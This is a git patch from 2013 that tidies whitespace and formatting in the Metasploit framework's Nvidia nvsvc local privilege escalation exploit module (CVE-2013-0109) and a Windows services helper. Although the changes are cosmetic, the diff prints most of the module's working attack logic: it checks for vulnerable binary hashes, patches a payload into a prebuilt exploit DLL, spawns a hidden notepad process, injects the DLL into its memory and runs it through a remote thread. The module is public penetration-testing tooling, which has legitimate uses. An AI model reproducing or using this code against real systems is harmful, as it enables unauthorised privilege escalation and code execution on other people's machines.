From 819ba30a3331896409a2e482a9476611b6df5cde Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 5 Jul 2013 22:35:22 +0100
Subject: [PATCH] msftidy

Conflicts:
	lib/msf/core/post/windows/services.rb
---
 lib/msf/core/post/windows/services.rb         |   4 +-
 .../exploits/windows/local/nvidia_nvsvc.rb    | 102 +++++++++---------
 2 files changed, 53 insertions(+), 53 deletions(-)

diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb
index 786487b353..2893e9b640 100644
--- a/lib/msf/core/post/windows/services.rb
+++ b/lib/msf/core/post/windows/services.rb
@@ -292,7 +292,7 @@ module Services
       # Now to grab a handle to the service.
       # Thank you, Wine project for defining the DELETE constant since it,
       # and all its friends, are missing from the MSDN docs.
-      # #define DELETE                     0x00010000
+      # #define DELETE 0x00010000
       handle = adv.OpenServiceA(manager, name, 0x10000)
       if (handle["return"] == 0)
         raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
@@ -312,7 +312,7 @@ module Services
   #
   # @param (see #service_start)
   #
-        # @return {} representing lpServiceStatus
+  # @return {} representing lpServiceStatus
   #
   # @raise (see #service_start)
   #
diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb
index f9a5121c8a..eef3e92e05 100644
--- a/modules/exploits/windows/local/nvidia_nvsvc.rb
+++ b/modules/exploits/windows/local/nvidia_nvsvc.rb
@@ -22,40 +22,40 @@ class Metasploit3 < Msf::Exploit::Local
 
 	def initialize(info={})
 		super(update_info(info, {
-			'Name'           => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
-			'Description'    => %q{
+			'Name'		 => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
+			'Description'	 => %q{
 				The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can
 				interact with the service. The service has a stacked based buffer overflow as a result
 				of a memmove operation.
-			
+
 				N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
 
 				This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
 				It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
 			},
-			'License'        => MSF_LICENSE,
-			'Author'         =>
+			'License'	 => MSF_LICENSE,
+			'Author'	 =>
 				[
 					'Peter Wintersmith', # Original exploit
 					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',   # Metasploit integration
 				],
-			'Arch'           => ARCH_X86_64,
-			'Platform'       => 'win',
-			'SessionTypes'   => [ 'meterpreter' ],
+			'Arch'		 => ARCH_X86_64,
+			'Platform'	 => 'win',
+			'SessionTypes'	 => [ 'meterpreter' ],
 			'DefaultOptions' =>
 				{
 					'EXITFUNC' => 'thread',
 				},
-			'Targets'        =>
+			'Targets'	 =>
 				[
 					[ 'Automatic', { } ]
 				],
-			'Payload'        =>
+			'Payload'	 =>
 				{
 					'Space'       => 2048,
 					'DisableNops' => true
 				},
-			'References'     =>
+			'References'	 =>
 				[
 					[ 'CVE', '2013-0109' ],
 					[ 'OSVDB', '88745' ],
@@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Local
 				rescue RuntimeError => e
 					print_error("Unable to retrieve service status")
 				end
-				
+
 				if sysinfo['Architecture'] =~ /WOW64/i
 					# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
 					return Exploit::CheckCode::Detected
 				else
 					path = svc['Command'].strip
 				end
-			
+
 				begin
 					hash = client.fs.file.md5(path).unpack('H*').first
 				rescue Rex::Post::Meterpreter::RequestError => e
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Local
 				if vuln_hashes.include?(hash)
 					vprint_good("Hash '#{hash}' is listed as vulnerable")
 					return Exploit::CheckCode::Vulnerable
-				else	
+				else
 					vprint_status("Hash '#{hash}' is not recorded as vulnerable")
 					return Exploit::CheckCode::Detected
 				end
@@ -115,20 +115,20 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 	end
 
-        def create_proc
-                windir = expand_path("%windir%")
-                cmd = "#{windir}\\system32\\notepad.exe"
-                return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
-        end
-	
+	def create_proc
+		windir = expand_path("%windir%")
+		cmd = "#{windir}\\system32\\notepad.exe"
+		return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
+	end
+
 	def is_running?
-                begin
-                        status = service_status('nvsvc')
+		begin
+			status = service_status('nvsvc')
 			return (status and status[:state] == 4)
-                rescue RuntimeError => e
-                        print_error("Unable to retrieve service status")
+		rescue RuntimeError => e
+			print_error("Unable to retrieve service status")
 			return false
-                end
+		end
 
 	end
 
@@ -147,40 +147,40 @@ class Metasploit3 < Msf::Exploit::Local
 		else
 			print_good("Service is running")
 		end
-	
-                dll = ''
-                offset = nil
-                file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
-                File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
 
-                pay = payload.encoded
+		dll = ''
+		offset = nil
+		file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
+		File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
 
-                bo = dll.index('PAYLOAD:')
-                raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
-               	dll[bo, pay.length] = [pay].pack("a*")
+		pay = payload.encoded
 
-                pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
+		bo = dll.index('PAYLOAD:')
+		raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
+		dll[bo, pay.length] = [pay].pack("a*")
 
-                pe.exports.entries.each do |entry|
-                        if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
-                                offset = pe.rva_to_file_offset( entry.rva )
-                                break
-                        end
-                end
+		pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
 
-                print_error("No offset found") unless offset
+		pe.exports.entries.each do |entry|
+			if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
+				offset = pe.rva_to_file_offset( entry.rva )
+				break
+			end
+		end
 
-                new_pid = create_proc
+		print_error("No offset found") unless offset
 
-                if not new_pid
-                        fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
-                end
+		new_pid = create_proc
 
-                vprint_status("Injecting payload into memory")
-                host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
-                mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
-                host_process.memory.protect(mem)
-                host_process.memory.write(mem, dll)
+		if not new_pid
+			fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
+		end
+
+		vprint_status("Injecting payload into memory")
+		host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
+		mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
+		host_process.memory.protect(mem)
+		host_process.memory.write(mem, dll)
 		print_status("Executing exploit...")
 		host_process.thread.create(mem+offset)
 	end